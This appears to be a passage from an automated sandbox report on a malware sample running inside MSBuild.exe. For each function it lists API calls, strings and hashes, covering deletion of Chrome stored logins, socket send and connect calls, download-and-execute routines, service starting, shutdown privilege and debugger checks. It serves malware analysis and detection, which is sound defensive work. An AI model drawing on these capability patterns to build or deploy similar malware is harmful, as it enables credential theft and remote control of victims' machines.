                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                            • String ID: u;~/
                                                                                                                                            • API String ID: 1286116820-1979702588
                                                                                                                                            • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                                                                            • Instruction ID: adcac59616ce0bf4d9b6f5e4feac4fc1c4b096f081e8a0f87c9a15d47e4c4f65
                                                                                                                                            • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                                                                            • Instruction Fuzzy Hash: 13510B719002099BE714DF69DC819AFB7BCEF41354F10456FE454A32A1EF389E46CB58
                                                                                                                                            Function 0040B21B Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                                                                                            • GetLastError.KERNEL32 ref: 0040B261
                                                                                                                                            Strings
                                                                                                                                            • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                                                                                            • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                                                                                            • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                                                                                            • UserProfile, xrefs: 0040B227
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DeleteErrorFileLast
                                                                                                                                            • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                                            • API String ID: 2018770650-1062637481
                                                                                                                                            • Opcode ID: 4bf0afd112dcaa7b01b7bef1570a104e6056d77a39d62cd62e866e491b3392bc
                                                                                                                                            • Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
                                                                                                                                            • Opcode Fuzzy Hash: 4bf0afd112dcaa7b01b7bef1570a104e6056d77a39d62cd62e866e491b3392bc
                                                                                                                                            • Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE
                                                                                                                                            Function 00416AB7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                                            • GetLastError.KERNEL32 ref: 00416B02
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                                                            • API String ID: 3534403312-3733053543
                                                                                                                                            • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                                                            • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                                                                                                            • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                                                            • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                                                                                            Function 004089A9 Relevance: 9.3, APIs: 6, Instructions: 288fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog.LIBCMT ref: 004089AE
                                                                                                                                              • Part of subcall function 004041F1: socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                                                                              • Part of subcall function 0040428C: connect.WS2_32(?,00F1A798,00000010), ref: 004042A5
                                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                                                                                            • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                                                                              • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(000002C4,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                                                              • Part of subcall function 00404468: SetEvent.KERNEL32(000002C4,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                                                              • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                                                              • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                                                              • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                                                                              • Part of subcall function 00404468: send.WS2_32(00000280,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4043647387-0
                                                                                                                                            • Opcode ID: ea13f7683f6f091a77670021696f9811019f57dab70408bb2bf5d7a912ed8442
                                                                                                                                            • Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
                                                                                                                                            • Opcode Fuzzy Hash: ea13f7683f6f091a77670021696f9811019f57dab70408bb2bf5d7a912ed8442
                                                                                                                                            • Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98
                                                                                                                                            Function 00419BC4 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                                                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                                                                                                                                            • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 276877138-0
                                                                                                                                            • Opcode ID: b329c8b03f607fc556bfe747d7dfe709dacdcffe937466b951116c7124fc47ce
                                                                                                                                            • Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
                                                                                                                                            • Opcode Fuzzy Hash: b329c8b03f607fc556bfe747d7dfe709dacdcffe937466b951116c7124fc47ce
                                                                                                                                            • Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
                                                                                                                                            Function 00450A7F Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443CF3,?,?,?,?,?,?,00000004), ref: 00450B61
                                                                                                                                            • _wcschr.LIBVCRUNTIME ref: 00450BF1
                                                                                                                                            • _wcschr.LIBVCRUNTIME ref: 00450BFF
                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443CF3,00000000,00443E13), ref: 00450CA2
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                            • String ID: u;~/
                                                                                                                                            • API String ID: 4212172061-1979702588
                                                                                                                                            • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                                                                            • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                                                                                                                                            • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                                                                            • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                                                                                                                                            Function 004158B9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                                              • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                                              • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                                                              • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                                              • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                                                                                            • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                                                                                            • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                                            • String ID: PowrProf.dll$SetSuspendState
                                                                                                                                            • API String ID: 1589313981-1420736420
                                                                                                                                            • Opcode ID: 9ae4c03283453911d56bba14c892a11426fe9fc09d18274aabc6115ba453b6e1
                                                                                                                                            • Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
                                                                                                                                            • Opcode Fuzzy Hash: 9ae4c03283453911d56bba14c892a11426fe9fc09d18274aabc6115ba453b6e1
                                                                                                                                            • Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                                                                                                                                            Function 004511E3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 0045127C
                                                                                                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 004512A5
                                                                                                                                            • GetACP.KERNEL32(?,?,00451502,?,00000000), ref: 004512BA
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InfoLocale
                                                                                                                                            • String ID: ACP$OCP
                                                                                                                                            • API String ID: 2299586839-711371036
                                                                                                                                            • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                                                            • Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
                                                                                                                                            • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                                                            • Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799
                                                                                                                                            Function 0041A63F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
                                                                                                                                            • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                                                                                                            • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                                                                                                                                            • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                                                                            • String ID: SETTINGS
                                                                                                                                            • API String ID: 3473537107-594951305
                                                                                                                                            • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                                                            • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
                                                                                                                                            • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                                                            • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
                                                                                                                                            Function 00407A8C Relevance: 7.7, APIs: 5, Instructions: 183fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog.LIBCMT ref: 00407A91
                                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1157919129-0
                                                                                                                                            • Opcode ID: 160c2ace42af5551170b97460db2d1c7e9fc336bd47d0bf9be650831b42887ab
                                                                                                                                            • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
                                                                                                                                            • Opcode Fuzzy Hash: 160c2ace42af5551170b97460db2d1c7e9fc336bd47d0bf9be650831b42887ab
                                                                                                                                            • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                                                                                                                                            Function 00406128 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                                                                                            • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DownloadExecuteFileShell
                                                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$open
                                                                                                                                            • API String ID: 2825088817-2582742282
                                                                                                                                            • Opcode ID: a95da4b7325fc149adb0805f75b0e23b5ca8d4f5b8b7c5b7cae352a40cddd066
                                                                                                                                            • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                                                                                                                                            • Opcode Fuzzy Hash: a95da4b7325fc149adb0805f75b0e23b5ca8d4f5b8b7c5b7cae352a40cddd066
                                                                                                                                            • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
                                                                                                                                            Function 00450E6A Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 205COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                                            • String ID: u;~/
                                                                                                                                            • API String ID: 2829624132-1979702588
                                                                                                                                            • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                                                                                                            • Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
                                                                                                                                            • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                                                                                                            • Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58
                                                                                                                                            Function 00406AC2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                                                                              • Part of subcall function 00404468: send.WS2_32(00000280,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileFind$FirstNextsend
                                                                                                                                            • String ID: x@G$x@G
                                                                                                                                            • API String ID: 4113138495-3390264752
                                                                                                                                            • Opcode ID: 5da22b88f3612dc83bd68ee8e63c7a4ce902fecb027f1d0f6defda3fc66c9271
                                                                                                                                            • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                                                                                                                                            • Opcode Fuzzy Hash: 5da22b88f3612dc83bd68ee8e63c7a4ce902fecb027f1d0f6defda3fc66c9271
                                                                                                                                            • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                                                                                                            Function 0041BB77 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                                                              • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                                                              • Part of subcall function 004126D2: RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                                                              • Part of subcall function 004126D2: RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                                            • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                                            • API String ID: 4127273184-3576401099
                                                                                                                                            • Opcode ID: f4ba7aec24a953ef4b92a26ea97f229a08492362b077529f009aa708e5b31fc0
                                                                                                                                            • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                                                                                                                                            • Opcode Fuzzy Hash: f4ba7aec24a953ef4b92a26ea97f229a08492362b077529f009aa708e5b31fc0
                                                                                                                                            • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
                                                                                                                                            Function 0043A65D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 0043A755
                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 0043A75F
                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 0043A76C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
